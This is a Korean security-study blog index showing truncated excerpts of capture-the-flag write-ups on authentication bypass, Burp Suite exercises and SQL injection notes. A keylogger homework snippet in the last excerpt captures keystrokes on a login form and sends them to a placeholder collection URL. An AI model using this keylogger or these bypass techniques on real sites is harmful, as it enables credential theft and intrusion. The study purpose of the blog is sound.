Archive for Dev. (junyup2)

์ง€์‹์„ ์ฑ„์›Œ๊ฐ€๋Š” ใ€Ž๊ฐœ๋ฐœ์ž/ํ™”์ดํŠธํ•ด์ปคใ€๋ฅผ ๋ชฉํ‘œ๋กœ ์ •๋ฆฌํ•˜๋Š” ๋ธ”๋กœ๊ทธ

๋ถ„๋ฅ˜ ์ „์ฒด๋ณด๊ธฐ 113

[SegFault] (Authentication Bypass) - Admin is Mine

[SegFault] Authentication Bypass (Admin) Admin is Mine. admin ๊ณ„์ •์œผ๋กœ ๋กœ๊ทธ์ธํ•˜์ž! ๋ฌธ์ œ ํŒŒ์•… ์œ„์˜ ํŽ˜์ด์ง€์— ์ ‘์†ํ•˜๋ฉด ์•„๋ž˜์™€ ๊ฐ™์€ ํ™”๋ฉด์ด ๋‚˜์˜จ๋‹ค. ์•Œ๊ณ  ์žˆ๋Š” ๊ณ„์ • : [ID/PW] : doldol / dol1234 Burp Suite์„ ์ด์šฉํ•˜์—ฌ ์‚ฌ์ดํŠธ ์ ‘์† ๊ณผ์ •์˜ ์ƒํƒœ์ฝ”๋“œ(Status code) ํ™•์ธ 200 OK : ์ •์ƒ์ ์ธ ์‘๋‹ต ๋กœ๊ทธ์ธ ๊ณผ์ •์˜ ๊ตฌ์กฐ๋ฅผ ์•Œ๊ธฐ ์œ„ํ•ด, ๋จผ์ € ์•Œ๊ณ  ์žˆ๋Š” ์ •๋ณด๋กœ ๋กœ๊ทธ์ธ ํ•ด๋ณธ๋‹ค. ์ œ๊ณต๋œ ID/PW๋ฅผ ์ž…๋ ฅํ–ˆ์Œ์—๋„ ํ•ด๋‹น ์ฐฝ์—์„œ ๋„˜์–ด๊ฐ€์ง€ ์•Š์Œ์„ ํ™•์ธ, ๋กœ๊ทธ์ธ์ด ์ง„ํ–‰๋˜์ง€ ์•Š๋Š”๋‹ค?! ๋กœ๊ทธ์ธ ๊ณผ์ •์˜ ํžˆ์Šคํ† ๋ฆฌ(HTTP history) ํ™•์ธ ํ•ด๋ณด์ž ! ID์™€ PW๋ฅผ ์ž…๋ ฅํ–ˆ์Œ์—๋„ ํŒŒ๋ผ๋ฏธํ„ฐ(Params)๊ฐ€ ๋“ค์–ด๊ฐ€์ง€ ์•Š๊ณ ์žˆ์Œ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค. ์š”์ฒญ(R..

[SegFault] (Authentication Bypass) - PIN Code Bypass

[SegFault] Authentication Bypass (Code) PIN CODE Bypass. ํ•ต๋ฏธ์‚ฌ์ผ ์‹œ์Šคํ…œ ์ ‘๊ทผ ๊ถŒํ•œ์„ ํš๋“ํ–ˆ๋‹ค! ๋ฐœ์‚ฌ๋งŒ ๋‚จ์•˜๋‹ค! ๊ฐ€์ž!!! ๋ฌธ์ œ ํŒŒ์•… ์œ„์˜ ํŽ˜์ด์ง€์— ์ ‘์†ํ•˜๋ฉด ์•„๋ž˜์™€ ๊ฐ™์€ ํ™”๋ฉด์ด ๋‚˜์˜จ๋‹ค. Burp Suite์„ ์ด์šฉํ•˜์—ฌ ์ƒํƒœ์ฝ”๋“œ(Status code) ํ™•์ธํ•œ๋‹ค. 200 OK (์ ‘์†) 200 OK (Fire) 200 OK (ํ™•์ธ) 200 OK (์ธ์ฆ) ์ƒ๊ฐ ๊ณผ์ • ์ƒ๊ฐ ๊ณผ์ • 1. ํŒŒ๋ผ๋ฏธํ„ฐ admin_pass๊ฐ€ ๋„˜์–ด๊ฐ€์ง€๋งŒ, ์•Œ์•„๋‚ผ ๋ฐฉ๋ฒ•์ด ์•ˆ๋ณด์ธ๋‹ค. 2. ๊ทธ๋Ÿฐ๋ฐ? URL์„ ๋ณด๋ฉด Step์œผ๋กœ ๋‹จ๊ณ„๊ฐ€ ๋„˜์–ด๊ฐ€๋Š” ๊ฒƒ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค. 3. ์ง์ ‘ ์ ‘๊ทผ ์‹œ๋„ ํ•ด๋ณด์ž!! 4. Step1.php ์—์„œ Step2.php๋กœ ๋„˜์–ด๊ฐ€๋‹ˆ๊นŒ? 5. ๋‹ค์Œ์€ Step3.php๊ฐ€ ์•„๋‹๊นŒ? ํ’€์ด ๊ณผ์ •..

[SegFault] (Authentication Bypass) - Get Admin

[SegFault] Authentication Bypass (Admin) Get Admin. admin ๊ณ„์ •์œผ๋กœ ์ ‘์†ํ•˜์ž! ๋ฌธ์ œ ํŒŒ์•… ์œ„์˜ ํŽ˜์ด์ง€์— ์ ‘์†ํ•˜๋ฉด ์•„๋ž˜์™€ ๊ฐ™์€ ํ™”๋ฉด์ด ๋‚˜์˜จ๋‹ค. ์•Œ๊ณ  ์žˆ๋Š” ๊ณ„์ • : [ID/PW] : doldol / dol1234 Burp Suite์„ ์ด์šฉํ•˜์—ฌ ์‚ฌ์ดํŠธ ์ ‘์† ๊ณผ์ •์˜ ์ƒํƒœ์ฝ”๋“œ(Status code) ํ™•์ธํ•œ๋‹ค. 302 Found 200 OK ๋กœ๊ทธ์ธ ๊ณผ์ •์˜ ๊ตฌ์กฐ๋ฅผ ์•Œ๊ธฐ ์œ„ํ•ด, ๋จผ์ € ์•Œ๊ณ  ์žˆ๋Š” ์ •๋ณด๋กœ ๋กœ๊ทธ์ธ ํ•ด๋ณธ๋‹ค. ๋กœ๊ทธ์ธ ๊ณผ์ •์˜ ์ƒํƒœ์ฝ”๋“œ(Status code) ํ™•์ธํ•œ๋‹ค. 302 Found : Cookie๋ฅผ ๋ฐ›์•„์˜ด 200 OK : ์ •์ƒ์ ์ธ ์‘๋‹ต ์š”์ฒญ(Request)๊ณผ ์‘๋‹ต(Response)๋ฅผ ์‚ดํŽด๋ณด์ž ! ์š”์ฒญ(Requset)์—์„œ POST ๋ฉ”์„œ๋“œ๋ฅผ ์ด์šฉํ•˜์—ฌ /2/login.p..

[SegFault] (Burp) - Burp Suite Prac 4.

[SegFault] Burp Suite Prac. Prac 4. Flag๋ฅผ ์ฐพ์œผ์‹œ์˜ค! ๋””์ฝ”๋”(Decoder) ํ™œ์šฉ ๋ฌธ์ œ ๋ฌธ์ œ ํŒŒ์•… ์œ„์˜ ํŽ˜์ด์ง€์— ์ ‘์†ํ•˜๋ฉด ์•„๋ž˜์™€ ๊ฐ™์€ ํ™”๋ฉด์ด ๋‚˜์˜จ๋‹ค. You are Not Admin์ด๋ผ๋Š” ๋ฌธ๊ตฌ๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค. ์ด๊ฒƒ์„ ๋ณด๋ฉด Admin์œผ๋กœ ๊ถŒํ•œ์„ ์ƒ์Šนํ•ด์ค˜์•ผ ํ•จ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค. Burp Suite์„ ์ด์šฉํ•˜์—ฌ ์ƒํƒœ์ฝ”๋“œ(Status code) ํ™•์ธํ•œ๋‹ค. 302 Found : ์š”์ฒญํ•œ ๋ฆฌ์†Œ์Šค๋ฅผ ๋‹ค๋ฅธ URL์—์„œ ์ฐพ์•˜๋‹ค. 200 OK : ์ •์ƒ์ ์ธ ์‘๋‹ต ์š”์ฒญํ•œ ๋ฆฌ์†Œ์Šค๋ฅผ ๋‹ค๋ฅธ URL์—์„œ ์ฐพ์Œ : ์ฟ ํ‚ค(Cookie)์—์„œ level ์ •๋ณด๋ฅผ ๋ฐ›์•„์˜จ ๊ฒƒ์„ ํ™•์ธ ํ•  ์ˆ˜ ์žˆ๋‹ค. Admin ๊ถŒํ•œ์„ ์œ„ํ•ด์„œ level์„ ์˜ฌ๋ ค์ค˜์•ผ ํ•จ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค. ์š”์ฒญ(Request)๊ณผ ์‘๋‹ต(Response)๋ฅผ ์‚ดํŽด๋ณด์ž..

[๊ธฐ๋ก์ผ์ง€] ๐Ÿ“š 06์ฃผ์ฐจ (๐Ÿ’‰SQL Injection - Data Extraction)

SQL Injection Data Extraction SQL Injection์„ ์ด์šฉํ•œ ๋ฐ์ดํ„ฐ ์ถ”์ถœ(Data Extraction) ๋ฐ์ดํ„ฐ ์ถ”์ถœ(Data Extraction) ๋ฐ์ดํ„ฐ ์ถ”์ถœ์„ ์œ„ํ•œ ์‚ฌ์ „ํ™•์ธ SQL ์ธ์ ์…˜์ด ์ผ์–ด๋‚˜๋Š” ๊ณณ 1. DB ๋ฐ์ดํ„ฐ๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ๊ณณ์ธ๊ฐ€? 2. ๊ทธ ๋ฐ์ดํ„ฐ๊ฐ€ ํ™”๋ฉด์— ๋‚˜์˜ค๋Š”๊ฐ€? ์•ˆ๋‚˜์˜ค๋Š”๊ฐ€? (DB์— ์žˆ๋Š” ๋ฐ์ดํ„ฐ๊ฐ€ ์›น ํŽ˜์ด์ง€์—(ํ™”๋ฉด์—) ๋‚˜์˜ค๋Š” ๊ฒฝ์šฐ์™€ ๋‚˜์˜ค์ง€ ์•Š๋Š” ๊ฒฝ์šฐ๊ฐ€ ์žˆ๋‹ค.) > ์›นํŽ˜์ด์ง€์— ๋ฐ์ดํ„ฐ๊ฐ€ ๋‚˜์˜ค๋Š” ๊ฒฝ์šฐ ex) ๊ฒŒ์‹œํŒ > ๋‚˜์˜ค์ง€ ์•Š๋Š” ๊ฒฝ์šฐ ex) ๋กœ๊ทธ์ธ ๊ธฐ๋Šฅ, ์•„์ด๋”” ์ค‘๋ณต ์ฒดํฌ (๋‚ด์šฉ์ด ๋‚˜์˜ค๋Š” ๊ฒƒ์ด ์•„๋‹ˆ๊ณ  ์žˆ๋‹ค or ์—†๋‹ค, ์˜ณ๋‹ค or ํ‹€๋ฆฌ๋‹ค๋งŒ ์•Œ๋ ค์คŒ) SQL Injection์€ DB ๋ฐ์ดํ„ฐ๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ๊ณณ์—์„œ๋Š” ์ž ์žฌ์ ์œผ๋กœ ์‹คํ–‰ ๊ฐ€๋Šฅํ•˜๋‹ค. ๊ทธ๋ž˜์„œ ์šฐ๋ฆฌ๋Š” ์–ด๋–ป๊ฒŒ ํ•˜๋ฉด ์›ํ•˜๋Š” ๋ฐ..

[SegFault] (Burp) - Burp Suite Prac 3.

[SegFault] Burp Suite Prac. Prac 3. ์•„๋ž˜ ํŽ˜์ด์ง€์—์„œ flag๋ฅผ ์ฐพ์œผ์„ธ์š”! Hint : 1 ~ 20 ๋ฆฌํ”ผํ„ฐ(Repeater) or ์ธํŠธ๋ฃจ๋”(Intruder) ํ™œ์šฉ ๋ฌธ์ œ ๋ฌธ์ œ ํŒŒ์•… ์œ„์˜ ํŽ˜์ด์ง€์— ์ ‘์†ํ•˜๋ฉด ์•„๋ž˜์™€ ๊ฐ™์€ ํ™”๋ฉด์ด ๋‚˜์˜จ๋‹ค. Burp Suite์„ ์ด์šฉํ•˜์—ฌ ์ƒํƒœ์ฝ”๋“œ(Status code) ํ™•์ธํ•œ๋‹ค. 200 OK : ์ •์ƒ์ ์ธ ์‘๋‹ต Cookies ์— answer = 1 ์ •๋ณด๊ฐ€ ์กด์žฌํ•จ์„ ํ™•์ธ ๊ฐ€๋Šฅํ•˜๋‹ค. ์š”์ฒญ(Request)๊ณผ ์‘๋‹ต(Response)๋ฅผ ์‚ดํŽด๋ณด์ž ! ๋ธŒ๋ผ์šฐ์ € ํ™”๋ฉด์—์„œ์˜ ํžŒํŠธ๋ฅผ ๋ณด๋ฉด Press F5, ์ƒˆ๋กœ๊ณ ์นจ์„ ํ•ด๋ณด๋ผ๋Š” ํžŒํŠธ ๋ฌธ๊ตฌ๊ฐ€ ๋ณด์ธ๋‹ค. ์ƒˆ๋กœ๊ณ ์นจ ๊ฒฐ๊ณผ ๋‹ฌ๋ผ์ง„ ์  Cache-Control : max-age=0 ์ฟ ํ‚ค(Cookie) ๋ถ€๋ถ„์— session ์•ž์— answer..

[SegFault] (Burp) - Burp Suite Prac 2.

[SegFault] Burp Suite Prac. Prac 2. ์•„๋ž˜ ์‚ฌ์ดํŠธ์—์„œ flag๋ฅผ ์ฐพ์•„๋ณด์„ธ์š”! Comparer ํ™œ์šฉ ์˜ˆ์ œ ๋ฌธ์ œ ํŒŒ์•… ์œ„์˜ ํŽ˜์ด์ง€์— ์ ‘์†ํ•˜๋ฉด ์•„๋ž˜์™€ ๊ฐ™์€ ํ™”๋ฉด์ด ๋‚˜์˜จ๋‹ค. LOOK INSIDE ์•ˆ์„ ๋“ค์—ฌ๋‹ค ๋ณด๋ผ๋Š” ํžŒํŠธ๊ฐ€ ๋ณด์ธ๋‹ค. Burp Suite์„ ์ด์šฉํ•˜์—ฌ ์ƒํƒœ์ฝ”๋“œ(Status code) ํ™•์ธํ•œ๋‹ค. 200 OK : ์ •์ƒ์ ์ธ ์‘๋‹ต ์š”์ฒญ(Request)๊ณผ ์‘๋‹ต(Response)๋ฅผ ์‚ดํŽด๋ณด์ž ! ์‘๋‹ต(Response)์— ๋ผ๋Š” ์ฃผ์„(ํžŒํŠธ)์ด ํ™•์ธ๋œ๋‹ค. ์š”์ฒญ(Request)์˜ ๊ฒฝ๋กœ GET /2_burp/ ์— a.html๊ณผ b.html์„ ๋„ฃ์–ด ๋ฐ์ดํ„ฐ๋ฅผ ํ™•์ธํ•ด์•ผ ํ•จ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค. ํ’€์ด ๊ณผ์ • (ํ•ด๊ฒฐ ๋ฐฉ์•ˆ) 1. Intercept On ์œผ๋กœ ๋ฐ”๊ฟ”์ค€๋‹ค. 2. ์žฌ์š”์ฒญ(Request) : ์ƒˆ๋กœ ๊ณ ์นจ(ํŽ˜..

[๊ธฐ๋ก์ผ์ง€] ๐Ÿ“š 05์ฃผ์ฐจ (๐Ÿ”“Authentication Bypass)

์ธ์ฆ (Authentication) Bypass with SQL Injection SQL Injection SQL Injection์ด๋ž€? ๋ง ๊ทธ๋Œ€๋กœ SQL ์งˆ์˜๋ฌธ์„ ์‚ฝ์ž…ํ•˜์—ฌ ์„œ๋ฒ„ ์ธก์—์„œ ์ค€๋น„๋œ SQL ์งˆ์˜๋ฌธ์„ ๋ณ€์กฐํ•˜๋Š” ๊ณต๊ฒฉ์„ ์˜๋ฏธํ•œ๋‹ค. ์‚ฌ์šฉ์ž๊ฐ€ ์ž…๋ ฅํ•˜๋Š” ์ž…๋ ฅ๊ฐ’์— ๋Œ€ํ•ด ๊ฒ€์ฆ์„ ์ œ๋Œ€๋กœ ํ•˜์ง€ ์•Š๋Š” ์ทจ์•ฝ์ ์„ ๊ฐ€์ง€๊ณ  ์žˆ์œผ๋ฉด SQL๋ฌธ์„ ๋ผ์›Œ ๋„ฃ์„์ˆ˜ ์žˆ๋‹ค๋Š” ๊ฒƒ์ด๋‹ค. ๊ณต๊ฒฉ์ž๊ฐ€ ์ž…๋ ฅ์ฐฝ์— ์•…์˜์ ์œผ๋กœ SQL ๋ฌธ์„ ๋ผ์›Œ๋„ฃ์–ด ๊ณต๊ฒฉํ•˜๋Š” ๊ฒƒ์ด ๋ฐ”๋กœ SQL Injection์ด๋‹ค. SQL๋ฌธ์„ ์ž…๋ ฅ์ฐฝ์— ์ ์œผ๋ฉด ๋ฌด์—‡์„ ํ•  ์ˆ˜ ์žˆ๊ธฐ์— ์ด๊ฒƒ์„ ๊ณต๊ฒฉ์ด๋ผ๊ณ  ํ• ๊นŒ? ์š”์ฒญ์„ ์ฒ˜๋ฆฌํ•˜๋Š” ๊ณผ์ •์—์„œ ํ•„์š”ํ•œ ๋ฐ์ดํ„ฐ๊ฐ€ ๋ณด๊ด€๋œ DB๊ฐ€ ์กด์žฌํ•˜๊ณ , ์š”์ฒญ์— ๋”ฐ๋ผ ํ•ด๋‹น DB๋ฅผ CRUD(์ €์žฅ,์กฐํšŒ,์ˆ˜์ •,์‚ญ์ œ)ํ•˜๋Š”๋ฐ ํ•„์š”ํ•œ SQL Query๊ฐ€ ์ค€๋น„๋˜์–ด์žˆ๋‹ค. ์ข€ ๋” ์ž์„ธํžˆ..

[๊ณผ์ œ] 04์ฃผ์ฐจ (1-1 β) ํ‚ค ๋กœ๊ฑฐ ๊ตฌํ˜„ (๋กœ๊ทธ์ธ ์ฐฝ)

๋ชจ์˜ ํ•ดํ‚น ์Šคํ„ฐ๋”” - 4์ฃผ์ฐจ ๊ณผ์ œ (1-1) ํ‚ค ๋กœ๊ฑฐ ์ถ”๊ฐ€ ๊ตฌํ˜„ ์ฝ”๋“œ ๊ตฌ์„ฑ key_logger.html key_logger.js key_logger.php view.html key_logger.html Login Form Login ๋กœ๊ทธ์ธ ํผ์˜ ํ‚ค๋กœ๊ฑฐ key_logger.js var keys=''; var url = 'http://ip adress/key_logger.php?c='; document.onkeydown = function(e) { var key = e.key; keys+=key; } window.setInterval(function(){ if(keys.length > 0) { var data = encodeURIComponent(keys) new Image().src = url + data..